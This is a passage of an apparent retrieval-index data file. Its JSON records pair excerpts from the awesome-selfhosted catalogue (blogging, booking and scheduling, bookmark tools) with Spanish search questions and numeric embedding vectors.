-0.05855, -0.06881, -0.04596, 0.08665, 0.03871, 0.05166, 0.06632, -0.0677, -0.05421, -0.07465, 0.05485, 0.02611, -0.03965, 0.00242, 0.01968, -0.07983, 0.0469, -0.16702, 0.01756, 0.04703, -0.0756, 0.12802, 0.03925, 0.00412, -0.02894, -0.08894, 0.0744, 0.03125, -0.1043, 0.08406, -0.03397, -0.07804, -0.0423, -0.12083, 0.04171, 0.00386, 0.07676, -0.03072, 0.0273, 0.06326, -0.05473, -0.00989, -0.02179, 0.09523, -0.04605, 0.02372, 0.17823, -0.06222, -0.04348, -0.04432, 0.06346, 0.10189, -0.03653, -0.01309, 0.07285, -0.02683, 0.0502, 0.02281, 0.06325, -0.00303, -0.04002, 0.00704, -0.00876, 0.14417, 0.08676, 0.03969, 0.17126, -0.07461, -0.04118, -0.06748, 0.0036, -0.0111, -0.12016, -0.03217, -0.08255, -0.03442, -0.0083, -0.02038, -0.01631, -0.05997, -0.0337, 0.07757, -0.02821, -0.08258, 0.11322, -0.06281, 0.05447, 0.14233, -0.09577, 0.0932, -0.03533, -0.007, -0.02598, -0.01668, 0.06328, 0.00632, -0.0057, -0.05272, -0.03656, -0.03965, 0.00743, -0.00436, -0.0662, 0.00957, 0.03102, -0.01761, 0.00942, -0.00242, -0.07531, -0.04144, 0.03077, 0.12761, 0.03118, 0.01904, -0.09361, -0.08725, 0.05656, -0.03902, -0.02902, 0.05811, -0.11242, -0.00355, -0.00755, 0.01434, 0.09143, -0.11435, 0.03554, 0.04953, 0.02568, 0.13477, -0.02065, 0.10444, 0.0147, -0.06199, 0.07797, 0.02122, -0.06523, -0.07125, -0.03952, 0.04312, -0.02172, -0.01655, 0.00667, 0.05601, 0.03033, 0.01376, 0.03793, 0.03737, -0.00191, 0.01063, -0.0326, -0.00477, 0.02663, -0.00144, 0.04137, -0.05601, -0.00551, -0.01847, 0.13262, -0.07489, -0.05873, 0.00814, -0.01294, 0.00693, 0.03039, 0.01496, -0.04783, -0.03343, 0.07774, 0.05868, 0.03837, -0.08495, -0.00323, -0.02221, 0.00638, -0.01651, 0.01026, 0.07768, 0.05544, 0.03821, 0.02478, 0.05298, 0.03006, 0.05006, -0.02723, -0.01819, -0.00995, 0.00441, 0.03074, 0.01032, -0.05569, -0.0523, -0.03849, -0.03457, 0.00141, -0.00939, -0.02683, 0.0013, -0.00343, -0.04494, -0.03659, 0.08932, 0.02381, -0.07542, 0.00305, -0.00036, -0.08594, 0.08076, 0.00192, -0.09339, -0.00377, -0.01231, 0.02696, -0.07898, -0.00114, 0.03794]} +{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: HTMLy β€” Databaseless PHP blogging platform. A flat-file CMS that allows you to create a fast, secure, and powerful website or blog in seconds [GPL-2.0, PHP]. Known β€” Collaborative social publishing platform [Apache-2.0, PHP]. Mataroa β€” Naked blogging platform for minimalists [MIT, Python]. PluXml β€” XML-based blog/CMS platform [GPL-3.0, PHP]. Serendipity β€” Serendipity (s9y) is a highly extensible and customizable PHP blog engine using Smarty templating [BSD-3-Clause, PHP]. WriteFreely β€” Writing software for starting a minimalist, federated blog β€” or an entire community [AGPL-3.0, Go].", "indexar": "cual es una alternativa libre y sencilla para crear un sitio web o blog rΓ‘pido?", "v": [-0.0554, 0.10702, -0.13469, 0.00059, -0.11604, -0.13825, -0.07916, -0.06815, -0.09625, -0.09065, -0.09005, -0.22461, -0.03602, -0.01177, 0.10449, -0.05687, 0.08323, -0.09252, 0.14629, -0.05135, -0.08023, -0.00116, -0.09362, -0.08895, -0.00892, -0.1807, 0.0553, 0.04815, -0.1213, 0.07992, 0.00159, 0.02993, 0.03206, 0.09801, -0.03857, 0.04069, 0.20461, 0.06144, 0.04082, -0.03894, -0.06698, -0.07779, -0.04707, 0.11667, -0.08187, 0.02867, 0.03713, -0.03449, -0.03213, 0.01603, 0.04355, -0.043, -0.08821, -0.00255, 0.03176, 0.03826, 0.15109, -0.25231, -0.04671, -0.02787, -0.08275, 0.11735, 0.02078, -0.06919, -0.05118, -0.00531, -0.01145, 0.04442, -0.03062, 0.0746, 0.08508, -0.13001, 0.07693, -0.12167, 0.03353, 0.04617, -0.07168, -0.02015, -0.0373, 0.08066, 0.04302, -0.07444, -0.0083, 0.01861, -0.02688, -0.04086, 0.04212, -0.10841, -0.04944, 0.01072, 0.0949, 0.01517, -0.01044, 0.04541, -0.05828, -0.06981, 0.03658, -0.01243, 0.01846, -0.03754, -0.04921, -0.001, -0.10512, 0.00689, 0.0573, -0.00311, 0.05173, 0.03089, -0.08083, -0.05802, 0.08892, 0.03576, -0.04694, -0.00533, -0.00968, 0.02862, -0.00045, 0.01769, -0.00657, -0.03817, -0.03812, 0.00772, -0.12284, -0.10367, -0.00091, 0.00665, 0.07593, 0.01336, -0.08304, -0.00071, 0.01396, -0.06358, -0.05012, -0.04959, 0.00889, -0.00723, 0.06659, -0.00829, 0.00069, -0.02, 0.01194, -0.03723, -0.0653, -0.03857, -0.01867, -0.08638, -0.00671, -0.02413, -0.05979, 0.025, -0.10105, 0.0552, -0.0341, 0.0092, -0.09876, -0.0673, -0.07209, 0.01934, -0.07263, 0.0649, -0.05543, 0.02417, 0.095, -0.00358, -0.0139, -0.04202, -0.04623, 0.05675, -0.03968, 0.03867, -0.03045, 0.08951, 0.00832, -0.09349, 0.08523, 0.00113, -0.02736, -0.05987, 0.02932, 0.00588, 0.02459, -0.02165, -0.11026, 0.04807, -0.02274, -0.03646, 0.08639, 0.05212, -0.03448, 0.06327, -0.02228, -0.06018, -0.08497, -0.03349, 0.03058, 0.04017, 0.01381, -0.10938, 0.03968, -0.04793, -0.02941, -0.09195, 0.02375, -0.01177, -0.08576, -0.02389, -0.00935, -0.03875, -0.00306, 0.03304, 0.02849, -0.01767, 0.02729, -0.0468, -0.0086, -0.00807, 0.04343, -0.01226, 0.00385, -0.02501, 0.08911, 0.0124, -0.02661, 0.05577, 0.02192, 0.06158, -0.01746, 0.02715, -0.03792, 0.00167, -0.02704, -0.0738, -0.03066, -0.03714, 0.00039, -0.00467, -0.00132, 0.04281, -0.02462, 0.05361, 0.01628, -0.008, 0.01482, -0.00694, -0.00888, -0.0002, -0.05965, 0.00645, -0.06763, -0.07894, -0.01212, -0.02556, 0.031, 0.00831, 0.00116, 0.03206]} +{"tipo": "pregunta", "herramienta": "Blogging Platforms", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Blogging Platforms", "tema": "blogging platforms", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Blogging Platforms: HTMLy β€” Databaseless PHP blogging platform. A flat-file CMS that allows you to create a fast, secure, and powerful website or blog in seconds [GPL-2.0, PHP]. Known β€” Collaborative social publishing platform [Apache-2.0, PHP]. Mataroa β€” Naked blogging platform for minimalists [MIT, Python]. PluXml β€” XML-based blog/CMS platform [GPL-3.0, PHP]. Serendipity β€” Serendipity (s9y) is a highly extensible and customizable PHP blog engine using Smarty templating [BSD-3-Clause, PHP]. WriteFreely β€” Writing software for starting a minimalist, federated blog β€” or an entire community [AGPL-3.0, Go].", "indexar": "con quΓ© herramienta puedo gestionar mi comunidad en lΓ­nea de forma federada?", "v": [-0.12271, 0.08699, -0.11913, -0.17159, 0.0162, -0.06653, -0.07345, 0.03798, -0.13632, -0.15536, -0.13171, -0.00057, -0.00922, -0.06473, 0.11076, 0.07396, 0.11084, -0.13108, -0.01372, -0.07624, -0.05092, 0.01272, 0.01866, -0.06015, -0.04062, -0.11917, 0.16217, -0.07116, -0.08837, 0.02299, 0.08637, 0.07228, 0.0366, 0.03018, -0.03822, 0.03862, -0.02223, 0.17094, -0.00669, -0.03295, -0.11847, 0.06817, -0.04831, -0.07018, 0.05085, 0.0002, -0.06133, -0.04322, 0.01794, 0.09895, -0.12104, -0.16205, -0.04008, -0.01355, -0.05086, -0.10089, 0.11058, -0.20822, 0.02831, -0.0045, -0.14313, -0.103, -0.04708, 0.01846, -0.01037, -0.00742, 0.04073, -0.11733, -0.08904, 0.07297, 0.02549, -0.04781, -0.05135, -0.04448, -0.10844, 0.02692, 0.09387, 0.04415, 0.0652, -0.02718, 0.07822, 0.03063, -0.05101, -0.00906, -0.04494, -0.08241, -0.02982, -0.02262, 0.03172, -0.00904, -0.05273, -0.02677, -0.08124, -0.12091, -0.0475, -0.06749, -0.02657, 0.0059, -0.0137, -0.03584, 0.05558, 0.07042, -0.13728, 0.09572, -0.05041, -0.03938, -0.02738, 0.01855, -0.02677, 0.06738, 0.12667, -0.04459, 0.07396, 0.02154, 0.01441, 0.072, -0.01448, -0.0494, 0.0726, -0.0205, 0.04881, -0.00902, 0.06165, -0.09997, 0.11002, 0.02577, -0.06365, 0.117, -0.02148, -0.04343, -0.08238, 0.01895, -0.06216, -0.02577, -0.03129, 0.01019, -0.07989, -0.06043, 0.01045, -0.10533, -0.03311, 0.04325, -0.03069, -0.0993, 0.04031, -0.0791, 0.00783, -0.12862, -0.01728, -0.03249, 0.07185, -0.07981, -0.05665, 0.02252, -0.01204, 0.04471, 0.03512, 0.06215, -0.02577, -0.01676, -0.06035, -0.04405, 0.03603, -0.05973, 0.04449, 0.02228, -0.00377, 0.02536, 0.02121, 0.00207, 0.01617, 0.04987, 0.08074, -0.00413, 0.06627, -0.05969, -0.0961, -0.05798, 0.01157, -0.02436, -0.03971, 0.0309, -0.02635, -0.03867, -0.02121, 0.02219, -0.02919, 0.0569, 0.01991, 0.03626, 0.07022, 0.0322, -0.01572, -0.01746, 0.073, -0.02082, 0.01665, -0.00976, 0.01338, -0.0418, -0.0518, 0.00557, 0.04186, 0.01794, -0.00373, 0.05089, -0.01897, -0.01072, 0.01111, 0.04866, 0.07899, -0.00541, 0.05868, -0.01396, -0.01873, -0.00266, 0.02239, -0.00893, -0.01122, -0.03625, 0.01258, 0.0143, 0.07345, -0.02908, -0.00279, -0.00796, -0.02124, 0.0437, -0.0058, -0.00862, 0.07714, -0.03997, -0.02192, 0.01736, 0.02437, -0.04259, 0.07244, -0.05574, -0.05043, 0.00507, 0.01825, 0.0842, 0.01756, 0.03057, -0.01679, -0.03816, -0.01193, 0.02801, -0.07159, -0.05911, -0.02763, -0.02671, 0.08273, -0.03064, 0.0282, 0.00022]} +{"tipo": "pregunta", "herramienta": "Booking and Scheduling", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Booking and Scheduling", "tema": "booking and scheduling", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Booking and Scheduling: Alf.io β€” Ticket reservation system [GPL-3.0, Java]. Cal.diy β€” Online appointment scheduling system [MIT, Nodejs]. Easy!Appointments β€” Allows your customers to book appointments with you via the web [GPL-3.0, PHP]. Hi.Events β€” Event management and ticketing platform for conferences, concerts, and more. Offering customizable event pages and embeddable ticket widgets [AGPL-3.0, Docker]. LibreBooking β€” Resource scheduling solution offering a flexible, mobile-friendly, and extensible interface for organizations to manage resource reservations [GPL-3.0, PHP/Docker]. QloApps β€” Customizable and intuitive web-based hotel reservation system and a booking engine [OSL-3.0, PHP/Nodejs]. Rallly β€” Create polls to vote on dates and times (alternative to Doodle) [AGPL-3.0, Nodejs/Docker]. Seatsurfing β€” Webbased app to book seats, desks and rooms for offices [GPL-3.0, Docker].", "indexar": "que programa hay para reservar citas online de forma gratuita?", "v": [0.05793, 0.05135, -0.07744, -0.15832, 0.116, -0.13643, -0.00497, -0.02693, -0.15538, -0.08576, 0.06733, -0.19035, 0.1476, -0.08458, 0.03812, 0.02124, 0.11061, 0.02844, 0.1531, 0.02342, 0.03192, 0.04575, 0.00567, -0.00901, -0.13963, -0.11137, 0.04368, -0.02744, -0.0115, 0.1343, 0.10759, -0.05764, -0.01283, -0.01394, 0.02662, 0.0371, 0.12454, 0.03819, -0.02386, -0.00691, 0.04975, 0.08214, 0.02006, 0.14408, -0.01285, -0.02227, 0.00173, 0.10217, 0.05166, -0.04718, 0.02899, -0.06654, 0.00728, -0.04038, 0.08205, -0.11293, -0.00849, -0.10908, -0.07744, -0.00382, -0.00892, -0.0195, 0.03302, 0.00484, 0.02085, 0.01242, 0.09851, 0.01091, -0.08094, 0.01845, -0.03744, -0.03053, 0.04605, -0.06389, 0.05029, -0.03432, 0.02491, -0.05747, 0.05527, -0.08349, -0.0411, 0.05659, 0.0916, 0.0589, -0.10043, 0.05681, 0.00195, -0.00748, 0.00663, 0.02401, 0.0689, 0.12808, 0.03541, 0.15009, 0.00945, -0.16915, 0.10086, 0.07886, 0.00127, 0.08525, 0.00665, -0.00457, -0.01358, 0.07782, -0.17462, 0.08097, 0.00519, -0.00677, -0.02944, 0.10904, 0.04159, -0.08668, 0.00414, 0.0053, 0.01541, 0.01614, 0.109, 0.0158, 0.05137, 0.0027, -0.05418, 0.08594, -0.10092, -0.00441, 0.09087, 0.08511, -0.04233, 0.06704, -0.11328, 0.0443, 0.03206, -0.00423, -0.06438, -0.04011, 0.00908, -0.10569, 0.03476, -0.01866, 0.01623, -0.0768, -0.05092, 0.04509, -0.07602, 0.02377, 0.02194, -0.0707, 0.03771, -0.08722, -0.05325, -0.02465, 0.02359, 0.05171, 0.00665, 0.0473, -0.02059, 0.04281, -0.01846, 0.00796, -0.07306, 0.04509, -0.00016, -0.01433, 0.0169, -0.08422, 0.00312, -0.05061, 0.00824, 0.00624, 0.00369, 0.05858, 0.01034, 0.10758, 0.03782, -0.13909, -0.02503, 0.02489, -0.02596, -0.01675, 0.01485, -0.07902, -0.07024, 0.00415, -0.00358, -0.00942, -0.07565, -0.03035, -0.02145, 0.06154, -0.01329, 0.04283, 0.03645, 0.00012, -0.09221, 0.0466, 0.0554, -0.06318, -0.03769, 0.03784, 0.04516, -0.02937, -0.10076, -0.1259, 0.01506, -0.00153, -0.00458, 0.07076, 0.01337, -0.0323, 0.04248, 0.10433, -0.04852, -0.04288, 0.01708, -0.09623, 0.02157, -0.01271, 0.01549, -0.05017, 0.01356, 0.01626, 0.01212, -0.05316, -0.00029, 0.0939, 0.06757, -0.04217, 0.02116, 0.02811, -0.00514, 0.01795, 0.03397, -0.09117, 0.03149, -0.0644, 0.06224, -0.02632, 0.04365, 0.05073, -0.06221, -0.0347, 0.00643, 0.05634, 0.02571, -0.00836, -0.03007, -0.02463, -0.05781, -0.04172, 0.02041, -0.01924, -0.07346, 0.01088, -0.00162, -0.02504, 0.00577, 0.02832]} +{"tipo": "pregunta", "herramienta": "Booking and Scheduling", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Booking and Scheduling", "tema": "booking and scheduling", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Booking and Scheduling: Alf.io β€” Ticket reservation system [GPL-3.0, Java]. Cal.diy β€” Online appointment scheduling system [MIT, Nodejs]. Easy!Appointments β€” Allows your customers to book appointments with you via the web [GPL-3.0, PHP]. Hi.Events β€” Event management and ticketing platform for conferences, concerts, and more. Offering customizable event pages and embeddable ticket widgets [AGPL-3.0, Docker]. LibreBooking β€” Resource scheduling solution offering a flexible, mobile-friendly, and extensible interface for organizations to manage resource reservations [GPL-3.0, PHP/Docker]. QloApps β€” Customizable and intuitive web-based hotel reservation system and a booking engine [OSL-3.0, PHP/Nodejs]. Rallly β€” Create polls to vote on dates and times (alternative to Doodle) [AGPL-3.0, Nodejs/Docker]. Seatsurfing β€” Webbased app to book seats, desks and rooms for offices [GPL-3.0, Docker].", "indexar": "con que puedo montar una plataforma para gestionar reservas de eventos y emitir boletos?", "v": [0.07777, 0.05071, -0.2214, -0.21138, -0.03141, 0.03577, 0.07534, -0.01424, -0.20633, -0.28532, -0.18236, -0.06065, 0.16033, 0.03786, 0.08043, 0.11477, 0.0758, 0.01508, 0.04284, 0.00602, -0.01732, -0.00402, 0.06017, 0.001, -0.0103, -0.03498, 0.01809, 0.00859, -0.07553, -0.00884, -0.03227, -0.06946, -0.03727, -0.03162, 0.11373, -0.07672, 0.01839, 0.10795, -0.07054, -0.1415, -0.05814, 0.00708, -0.01706, -0.0105, 0.04164, -0.03945, -0.01548, -0.03531, 0.01295, -0.04774, 0.10195, -0.05757, -0.12225, 0.00594, 0.02689, -0.08985, 0.06018, -0.13215, 0.02331, -0.00796, -0.00487, -0.05071, -0.0073, 0.10848, -0.01558, 0.07929, -0.02732, 0.05146, -0.04415, 0.04769, -0.10023, -0.03907, 0.04572, 0.05326, 0.05815, 0.04599, 0.06561, 0.02514, 0.00234, 0.02456, -0.07942, 0.0415, -0.0617, 0.1135, -0.02826, -0.05414, -0.01087, -0.12269, -0.03337, 0.03003, 0.08063, -0.0287, 0.06366, -0.04512, -0.002, -0.13944, 0.09322, 0.07572, -0.13903, -0.07546, -0.07825, 0.08207, 0.0206, 0.07316, -0.03195, 0.04387, 0.06334, -0.08717, 0.05479, 0.00526, -0.016, 0.01006, -0.05201, 0.03432, -0.04253, 0.05952, 0.01061, 0.04087, 0.075, 0.09871, -0.03299, 0.00567, 0.05749, -0.11707, 0.13716, 0.01117, -0.02259, 0.08674, -0.00048, 0.05303, -0.05593, -0.03662, -0.06184, 0.02684, 0.03712, -0.03165, -0.01468, 0.00337, 0.05155, -0.03671, -0.04925, -0.00486, 0.02692, -0.08605, 0.15911, -0.00326, -0.06484, -0.08003, -0.01653, 0.00653, 0.02009, -0.01349, -0.02062, 0.05187, -0.05095, -0.00536, -0.02959, -0.02389, -0.04982, 0.02933, 0.01278, 0.01184, -0.02614, 0.04337, 0.01465, -0.02609, -0.06786, 0.01237, 0.03131, 0.04215, -0.01584, 0.08936, 0.11115, -0.06312, 0.08357, -0.01194, -0.06031, -0.04153, 0.05155, -0.03519, -0.02528, -0.05732, -0.05654, 0.01069, 9e-05, -0.01976, 0.06338, 0.05156, -0.00184, 0.05925, 0.066, 0.06028, 0.02368, -0.00358, 0.00241, -0.0449, -0.05582, 0.02023, 0.004, -0.0019, -0.03585, 0.04242, 0.04055, -0.02998, 0.00604, -0.0101, -0.01425, 0.06167, 0.05494, 0.00406, -0.01577, 0.00645, 0.06134, -0.08383, -0.03651, 0.00025, 0.02383, -0.03265, 0.02712, -0.0158, 0.02379, 0.02757, 0.02256, 0.03216, 0.06472, -0.04247, 0.04868, 0.00228, 0.01507, -0.01021, 0.02593, 0.02607, 0.04632, 0.03813, 0.03876, -0.02826, 0.0909, -0.01668, -0.04261, 0.03395, 0.01191, 0.05228, 0.01443, -0.04618, -0.03409, -0.00759, -0.07838, 0.0308, 0.03121, -0.0597, -0.03256, -0.01974, 0.05962, -0.01935, 0.01313, -0.06145]} +{"tipo": "pregunta", "herramienta": "Booking and Scheduling", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Booking and Scheduling", "tema": "booking and scheduling", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Booking and Scheduling: Alf.io β€” Ticket reservation system [GPL-3.0, Java]. Cal.diy β€” Online appointment scheduling system [MIT, Nodejs]. Easy!Appointments β€” Allows your customers to book appointments with you via the web [GPL-3.0, PHP]. Hi.Events β€” Event management and ticketing platform for conferences, concerts, and more. Offering customizable event pages and embeddable ticket widgets [AGPL-3.0, Docker]. LibreBooking β€” Resource scheduling solution offering a flexible, mobile-friendly, and extensible interface for organizations to manage resource reservations [GPL-3.0, PHP/Docker]. QloApps β€” Customizable and intuitive web-based hotel reservation system and a booking engine [OSL-3.0, PHP/Nodejs]. Rallly β€” Create polls to vote on dates and times (alternative to Doodle) [AGPL-3.0, Nodejs/Docker]. Seatsurfing β€” Webbased app to book seats, desks and rooms for offices [GPL-3.0, Docker].", "indexar": "cual es una alternativa libre a Doodle para votar en fechas?", "v": [-0.00059, 0.0518, -0.07775, 0.08408, -0.09794, 0.02885, 0.14411, -0.12236, -0.03855, -0.161, -0.02208, -0.34231, 0.02614, -0.04124, 0.02179, -0.08295, 0.15337, -0.13381, 0.0892, 0.01688, -0.05425, -0.10926, -0.0382, -0.0114, -0.02254, -0.0717, 0.0231, 0.11881, -0.07561, 0.00988, 0.02126, -0.1399, 0.04439, -0.05523, 0.13329, -2e-05, 0.14731, 0.13666, -0.0115, -0.041, 0.0357, 0.04465, -0.07517, 0.06565, -0.07025, -0.05994, -0.10588, 0.13493, 0.05617, -0.05817, -0.0116, 0.04398, 0.02779, 0.04975, 0.11032, 0.04365, 0.05459, -0.13123, -0.10739, -0.02729, -0.06733, 0.04882, 0.11596, -0.01462, 0.00026, 0.07817, -0.06351, 0.00987, 0.08666, 0.1181, 0.02139, -0.0131, -0.00413, 0.0334, -0.12449, 0.03728, -0.0007, -0.05483, -0.01812, 0.02304, 0.08972, -0.08213, -0.02111, 0.09372, 0.04081, 0.00609, 0.07344, -0.10217, -0.05537, -0.03952, 0.13974, 0.05789, 0.09678, 0.13649, 0.00393, -0.08976, 0.01236, 0.04912, -0.07764, 0.02615, 0.03266, -0.00526, -0.02598, 0.04776, 0.00953, -0.02451, -0.01904, 0.07179, -0.02187, 0.03747, -0.02215, 0.09133, -0.11567, -0.03029, 0.03671, -0.05544, 0.02755, -0.02104, -0.03165, 0.00557, 0.03794, 0.02507, -0.06417, -0.10422, 0.04886, 0.06178, 0.06402, 0.03243, -0.08555, 0.04605, 0.052, 0.02555, -0.0466, -0.01613, -0.11425, -0.0083, -0.0059, 0.0191, 0.01439, 0.0232, -0.00012, 0.06113, 0.05718, -0.00787, 0.07164, -0.01321, -0.04453, -0.0078, -0.012, -0.04245, -0.05771, -0.07552, 0.03629, 0.07996, -0.02039, -0.03986, 0.00168, 0.00124, -0.05422, 0.07639, -0.01171, -0.04297, -0.01768, -0.01125, 0.01849, -0.01594, -0.01824, -0.05231, -0.10643, 0.0392, 0.07056, 0.09159, -0.00361, 0.02952, 0.0303, -0.05361, 0.01717, 0.00409, -0.00149, -0.07472, 0.04512, 0.02803, -0.00472, 0.03778, 0.01406, -0.0538, 0.04952, 0.0161, 0.02034, -0.01258, -0.06045, 0.02659, 0.01676, -0.0444, 0.01474, -0.00972, 0.07129, -0.04126, -0.03125, 0.00427, -0.09398, -0.01656, -0.03101, -0.01055, -1e-05, 0.01141, -0.09151, 0.06173, 0.05032, 0.01568, 0.01401, -0.00132, 0.03874, 0.02159, -0.06749, 0.01439, 0.05587, -0.01428, -0.03605, -0.05179, 0.01425, -9e-05, 0.05727, -0.00597, -0.02939, 0.03611, 0.06008, 0.0098, 0.01346, -0.02021, 0.04433, 0.0335, 0.02758, -0.00393, -0.0166, -0.01566, 0.04043, 0.02325, -0.00703, -0.05278, 0.07631, 0.02533, -0.05169, -0.08299, -0.03265, -0.00846, -0.0677, 0.02521, -0.05547, -0.06976, -0.03324, 0.04462, 0.01646, -0.03951, 0.02654, -0.02003]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: Betula β€” Single-user federated bookmark manager with Fediverse support and archives [AGPL-3.0, Go]. Buku β€” Powerful bookmark manager and a personal textual mini-web [GPL-3.0, Python/deb]. Digibunch β€” Create bunches of links to share with your learners or colleagues [AGPL-3.0, Nodejs/PHP]. Espial β€” An open-source, web-based bookmarking server [AGPL-3.0, Haskell]. Faved β€” Handcrafted bookmark manager combining powerful tagging, instant search, and a clean, distraction-free interface. Built for large collections and advanced workflows, optimized for efficiency and ease-of-use [MIT, Docker]. Firefox Account Server β€” Host your own Firefox accounts server [MPL-2.0, Nodejs/Java]. Karakeep β€” Bookmark-everything app with a touch of AI for the data hoarders out there [AGPL-3.0, Docker]. LinkAce β€” Bookmark archive with automatic backups to the Internet Archive, link monitoring, and a full REST API. Installation is done via Docker, or as a simple PHP application [GPL-3.0, Docker/PHP].", "indexar": "quΓ© gestor de enlaces funciona en local y soporta el fediverse?", "v": [0.06409, 0.11084, -0.19079, -0.04307, 0.08077, 0.02986, 0.03895, -0.12201, -0.01508, -0.25186, -0.22379, -0.05387, -0.12125, -0.08356, 0.14641, 0.05389, 0.14989, -0.16433, -0.06276, -0.06225, -0.04954, -0.01203, 0.0581, -0.14733, -0.05045, 0.00689, 0.13062, -0.04281, -0.02075, -0.10937, 0.04661, -0.06382, 0.03851, -0.05102, -0.04664, 0.05802, -0.00607, -0.00633, 0.02028, -0.00306, 0.02242, -0.03903, -0.0926, -0.04314, -0.03416, -0.02914, 0.01053, -0.16174, 0.09076, 0.02119, -0.18084, -0.11458, -0.08349, -0.00881, -0.13934, -0.03317, 0.05144, -0.01934, 0.0375, 0.03514, -0.13337, 0.01965, -0.10312, -0.01507, 0.04423, -0.07855, 0.06731, -0.03115, -0.04337, -0.04059, -0.09688, 0.00669, -0.01964, 0.08233, -0.01897, 0.14921, 0.1073, 0.08048, 0.02535, -0.01951, 0.07926, 0.03255, -0.06202, 0.0491, 0.00907, 0.00028, 0.0148, -0.09858, -0.02484, -0.08408, -0.03309, 0.01941, 0.06784, -0.01784, -0.09221, -0.05222, -0.02232, 0.05942, -0.04526, 0.0786, 0.0773, -0.03437, 0.02974, 0.09802, 0.0551, 0.06076, 0.05697, -0.02343, 0.05978, -0.0217, 0.06846, -0.03981, -0.06548, -0.01628, -0.02611, 0.00333, 0.00755, -0.01973, 0.04871, 0.01652, -0.01031, -0.02901, 0.00976, -0.03758, -0.05574, 0.05904, 0.10347, 0.06292, 0.0678, 0.0833, -0.01643, 0.01956, -0.03533, -0.04651, -0.02853, 0.02961, 0.03948, -0.01825, 0.00066, -0.06724, 0.00742, 0.03623, 0.03378, -0.01394, 0.00881, -0.05737, 0.01197, -0.05253, -0.03858, -0.00953, 0.06471, -0.02091, -0.03694, 0.05399, -0.03561, -0.00791, -0.02525, -0.01692, -0.06298, 0.04316, 0.04475, -0.01742, -0.00168, 0.03442, -0.06727, -0.01964, -0.05302, 0.04687, 0.07509, 0.05307, -0.04139, 0.12904, -0.03502, -0.05425, -0.00916, -0.09865, -0.01476, -0.08155, 0.07088, -0.01307, -0.01081, 0.03583, 0.04042, 0.13531, -0.05139, -0.06713, -0.01486, 0.02298, -0.0234, 0.03893, 0.06321, -0.0078, -0.03456, 0.0213, 0.02411, -0.03125, -0.05074, -0.04408, 0.05569, -0.01331, -0.009, -0.06077, 0.02509, -0.03034, 0.01671, 0.05854, -0.10095, 0.01372, -0.03685, 0.02932, 0.00731, -0.05127, 0.05348, 0.07545, -0.03966, -0.0068, 0.0482, -0.07043, 0.00343, -0.01698, 0.04141, -0.03498, -0.00088, -0.00821, 0.02314, 0.02211, 0.03513, 0.00832, 0.03009, 0.09154, -0.02847, 0.00526, -0.07479, -0.01649, 0.00149, -0.02974, 0.01464, 0.01322, -0.0419, -0.04082, 0.01554, 0.06211, -0.00927, -0.08361, -0.01448, -0.04325, -0.03684, -0.02823, 0.02483, -0.08052, -0.03872, -0.01524, 0.00161, -0.01057, 0.0451, 0.02535]} +{"tipo": "pregunta", "herramienta": "Bookmarks and Link Sharing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Bookmarks and Link Sharing", "tema": "bookmarks and link sharing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Bookmarks and Link Sharing: Betula β€” Single-user federated bookmark manager with Fediverse support and archives [AGPL-3.0, Go]. Buku β€” Powerful bookmark manager and a personal textual mini-web [GPL-3.0, Python/deb]. Digibunch β€” Create bunches of links to share with your learners or colleagues [AGPL-3.0, Nodejs/PHP]. Espial β€” An open-source, web-based bookmarking server [AGPL-3.0, Haskell]. Faved β€” Handcrafted bookmark manager combining powerful tagging, instant search, and a clean, distraction-free interface. Built for large collections and advanced workflows, optimized for efficiency and ease-of-use [MIT, Docker]. Firefox Account Server β€” Host your own Firefox accounts server [MPL-2.0, Nodejs/Java]. Karakeep β€” Bookmark-everything app with a touch of AI for the data hoarders out there [AGPL-3.0, Docker]. LinkAce β€” Bookmark archive with automatic backups to the Internet Archive, link monitoring, and a full REST API. Installation is done via Docker, or as a simple PHP application [GPL-3.0, Docker/PHP].", "indexar": "con quΓ© programa puedo crear grupos de enlaces para compartir con colegas?", "v": [0.02733, 0.20475, -0.07494, -0.16176, 0.00099, -0.12941, 0.03691, 0.02186, -0.04954, -0.21085, -0.0355, -0.00586, -0.06822, -0.15461, 0.09834, 0.08131, 0.10271, -0.05982, 0.06327, 0.0367, 0.00288, 0.01814, -0.04397, -0.05391, -0.0226, -0.14314, 0.07366, -0.00844, 0.06182, 0.10577, -0.03196, -0.03677, -0.07843, -0.09669, 0.00377, 0.00539, 0.11947, 0.12661, 0.04373, -0.00851, -0.13223, 0.01473, -0.18578, -0.03891, -0.00499, 0.04951, -0.0893, -0.00287, -0.00077, -0.01507, -0.02592, 0.06532, -0.07657, -0.02648, -0.08365, -0.08712, 0.04994, -0.1606, -0.04973, 0.06571, -0.04751, 0.11611, -0.04239, -0.04058, -0.00931, -0.02547, 0.08799, 0.01985, -0.082, 0.13287, -0.05387, -0.08046, -0.03095, -0.05113, 0.00013, 0.13511, -0.05603, -0.00664, -0.02057, -0.01227, 0.01483, 0.07545, 0.14258, 0.01692, 0.01695, 0.00161, 0.02292, 0.03643, -0.08074, -0.04027, 0.02206, 0.10616, 0.03335, 0.01489, 0.01319, -0.05565, 0.07701, 